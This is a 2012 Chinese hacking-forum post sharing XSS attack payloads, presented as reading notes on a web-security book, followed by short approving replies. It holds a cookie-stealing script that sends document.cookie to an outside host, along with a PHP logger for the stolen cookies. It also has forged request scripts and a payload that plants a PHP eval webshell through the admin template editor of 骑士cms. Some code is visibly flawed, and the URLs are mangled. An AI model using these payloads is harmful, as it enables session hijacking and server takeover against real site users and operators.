查看: 10499|回复: 5

【原创】XSS Payload

[复制链接]
发表于 2012-7-30 21:18:42 | 显示全部楼层 |阅读模式
本帖最后由 L.N. 于 2012-7-30 21:34 编辑

注意代码中的url连接有问题!没法修改!

xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。

1.盗取cookie,发起cookie劫持
使用xss漏洞插入cookie.js
cookie.js代码:



  1. var img = document.createElement("img");

  2. img.src = [url=http://lanu.sinaapp.com/cookie.php?cookie=+escape(document.cookie]http://lanu.sinaapp.com/cookie.php?cookie=+escape(document.cookie[/url]);

  3. document.body.appendChild(img);
复制代码

cookie.php代码


  1. <?php

  2.     $file = fopen("cookie.txt","a");

  3.     fwrite($file,$_GET['cookie']);

  4.     fclose($file);

  5. ?>
复制代码

2.构造GET和POST请求
get.js代码:


  1. var img = document.createElement("img");

  2. img.src = "一个可以使用的get请求链接";

  3. document.body.appendChild(img);
复制代码

post.js代码:
代码1:(DOM节点方式)


  1. var f = document.createElement("form");

  2. f.action ="";

  3. f.method = "post";

  4. document.body.appendChild(f);

  5. var i1 = document.createElement("input");

  6. i1.name = "xxx";

  7. i1.value = "xxxx";

  8. f.appendChild(i1);

  9. var i2 = document.createElement("input");

  10. i2.name = "aaa";

  11. i2.value = "aaa";

  12. f.appendChild(i2);

  13. f.submit();
复制代码

代码2:


  1. var dd = document.createElement("div");

  2. document.body.appendChild(dd);

  3. dd.innerHTML ='<form action="" method="post" id="xssform"
  4. name="mbform">'+'<input type="hidden" value="xxxx" name="xxx"
  5. />'+'<input type="text" value="aaaa" name="aaa"
  6. />'+'</form>';

  7. document.getElementById("xssform").submit();
复制代码

代码3:(使用XMLHttpRequest)


  1. var url = "http://lanu.sinaapp.com";

  2. var postStr = "aaa=aaaa&xxx=xxxx";

  3. var ajax = null;

  4. if(windows.XMLHttpRequest)

  5. {

  6.     ajax = new XMLHttpRequest();

  7. }

  8. else if(window.ActiveXObject)

  9. {

  10.     ajax = new
  11. ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本

  12. }

  13. else

  14. {

  15.     return;

  16. }

  17. ajax.open("POST", url , true);

  18. ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

  19. ajax.send(postStr);

  20. //ajax.open("GET", url, true);

  21. //ajax.send(null);

  22. ajax.onreadystatechange = function()

  23. {

  24.     if(ajax.readyState == 4 && ajax.status == 200)

  25.     {

  26.         //alert("Done!");

  27.     }

  28. }
复制代码


-------------------
3.xss钓鱼
4.浏览器识别和用户安装软件识别
  1. [url=http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/]http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/[/url]
复制代码
[/url]
5.css history hack
  1. [url=http://ha.ckers.org/weird/CSS-history-hack.html]http://ha.ckers.org/weird/CSS-history-hack.html[/url]
复制代码
[/url]

读《白帽子讲web安全》笔记
---------------------
xxs payload getshell 实例:
骑士cms getshell

//构造好的能写入一句话的连接

  1. var
  2. Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';

  3. try

  4. {

  5. //调用XMLHttpRequest
  6.     var xml = window.XMLHttpRequest ?
  7. (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));

  8.    
  9. xml.open("POST",'admin_templates.php?act=do_edit',false);
  10.    
  11. xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

  12.     xml.onreadystatechange = function()
  13.    
  14. {
  15.         if(xml.readyState == 4)

  16.         {

  17.         }
  18.    
  19. }
  20.     xml.send(Shelldata);
  21. }
  22. catch(e)

  23. {

  24. }

复制代码

评分

参与人数 2i币 +40 收起 理由
N.O + 20 很给力!
s0mewhat + 20

查看全部评分

回复

使用道具 举报

发表于 2012-7-30 21:20:27 | 显示全部楼层
两金币
回复 支持 反对

使用道具 举报

发表于 2012-7-30 21:23:28 | 显示全部楼层
不错。。。。顶
回复 支持 反对

使用道具 举报

发表于 2012-7-30 21:23:40 | 显示全部楼层
打到地主老财
回复 支持 反对

使用道具 举报

发表于 2012-7-30 21:24:53 | 显示全部楼层
顶起!!!!!!!!!!!!
回复 支持 反对

使用道具 举报

发表于 2012-7-30 21:28:04 | 显示全部楼层
getshell  给力哇。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 15:46 , Processed in 0.057713 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部